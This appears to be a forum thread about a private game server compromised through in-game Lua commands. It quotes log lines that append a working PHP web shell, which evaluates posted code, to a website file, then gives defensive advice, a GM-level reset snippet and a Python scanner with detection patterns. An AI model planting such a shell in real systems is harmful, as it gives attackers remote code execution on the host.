BorzZ

Hack

Hello guys, I have a big question that is driving me crazy!

Someone somehow hacked my server and used a lua cmd IN GAME to upload a file inside my website to hack my server and make everyone on the server a GM!

Look at this: I found it in DoCommand (Commands Log)

[03-24 02:57:25][ExecWork]Cha-Chibi+533: lua haxfilename = "C:\\Program Files (x86)\\Zend\\Apache2\\htdocs\\classes\\smarty\\internals\\core.smarty.php"
[03-24 02:57:32][ExecWork]Cha-Chibi+533: lua if(fileexists(haxfilename) ~= false) then haxfile = io.open(haxfilename,'a');end
[03-24 02:57:38][ExecWork]Cha-Chibi+533: lua haxfile:write("<?php $query = stripslashes($_POST[\'query\']);")
[03-24 02:57:43][ExecWork]Cha-Chibi+533: lua haxfile:write("eval($query); ;?> <form method=\"POST\" action=\"<?PHP echo stripslashes($_SERVER[\'PHP_SELF\']);?>")
[03-24 02:57:47][ExecWork]Cha-Chibi+533: lua haxfile:write("\" accept-charset=\"UTF-8\">")
[03-24 02:57:51][ExecWork]Cha-Chibi+533: lua haxfile:write(" <textarea name=\"query\" cols=\"48\" rows=\"8\" ></textarea>")
[03-24 02:57:55][ExecWork]Cha-Chibi+533: lua haxfile:write("<p><input type=\"submit\" value=\"Submit\"></p></form>")
[03-24 02:57:59][ExecWork]Cha-Chibi+533: lua haxfile:close()                            
 


This is one of the oldest hacks in the book. Ideally, this isn't the actual problem.
First, determine how the hacker was able to get a GM-authorized account.
Some possibilities: web backdoor, SQL injection, embedded lua script within the serverfile itself.

Now, a prevention (assuming you use v3ctor's GS), and you alone know who your GMs are.
-- Strip the GM level from any GM character that is not the one you named.
if GetGmLv(playerData) > 0 then
    if GetChaDefaultName(playerData) ~= 'yourName' then
        SetGmLv(playerData, 0)
    end
end

Of course, not the brightest solution, but this would automatically prevent lua commands from being executed in-game by unauthorized guests.

4 hours ago, xtc said:

This is one of the oldest hacks in the book. Ideally, this isn't the actual problem.
First, determine how the hacker was able to get a GM-authorized account.
Some possibilities: web backdoor, SQL injection, embedded lua script within the serverfile itself.

Now, a prevention (assuming you use v3ctor's GS), and you alone know who your GMs are.
-- Strip the GM level from any GM character that is not the one you named.
if GetGmLv(playerData) > 0 then
    if GetChaDefaultName(playerData) ~= 'yourName' then
        SetGmLv(playerData, 0)
    end
end

Of course, not the brightest solution, but this would automatically prevent lua commands from being executed in-game by unauthorized guests.

Can you tell me, is it possible to find out if there are any bds on my serverfiles?


@BorzZ You have to scan all .lua files. It is hard work, so you should take the files from trusted sources.
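A first-pass scanner for the two checks discussed in this thread (reviewing the command log from the first post and scanning all .lua files), as an added example that is not from any poster or from the server project. The primitive list, the function names and the sample log lines are assumptions constructed for illustration; SetGmLv is included because it appears in xtc's post.

```python
import re
from pathlib import Path

# Lua calls that give a script file, process, dynamic-code or GM-level access.
# This list is an assumption for the example; extend it for your own server build.
RISKY = re.compile(
    r"\b(?:io\.open|io\.popen|os\.execute|os\.remove|loadstring|SetGmLv)\b"
    r"|:write\s*\(|<\?php",
    re.IGNORECASE,
)
# Line layout copied from the command log quoted in the thread.
LOG_LINE = re.compile(r"^\[(?P<ts>[\d\- :]+)\]\[ExecWork\](?P<who>.+?): lua (?P<cmd>.*)$")

def risky_hits(lua_text):
    """Return (line_number, line, [matched primitives]) for each suspicious line."""
    hits = []
    for no, line in enumerate(lua_text.splitlines(), 1):
        found = sorted({m.group(0).lower() for m in RISKY.finditer(line)})
        if found:
            hits.append((no, line.strip(), found))
    return hits

def scan_command_log(lines):
    """Flag in-game `lua` commands in the command log that touch risky primitives."""
    flagged = []
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if m and RISKY.search(m["cmd"]):
            flagged.append((m["ts"], m["who"], m["cmd"]))
    return flagged

def scan_tree(root):
    """Scan every .lua file under root; returns {path: hits} for files with hits."""
    report = {}
    for path in Path(root).rglob("*.lua"):
        hits = risky_hits(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    r"""[03-24 02:57:25][ExecWork]Cha-Tester+1: lua f = io.open("C:\\web\\htdocs\\index.php",'a')""",
    r"""[03-24 02:57:38][ExecWork]Cha-Tester+1: lua f:write("<?php /* placeholder */ ?>")""",
    r"""[03-24 03:10:02][ExecWork]Cha-Admin+2: lua print("restart in 5 minutes")""",
]

if __name__ == "__main__":
    for ts, who, cmd in scan_command_log(SAMPLE_LOG):
        print(f"{ts}  {who}  {cmd}")
```

A hit is a prompt for manual review, not proof of a backdoor, and obfuscated calls will not match these patterns.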
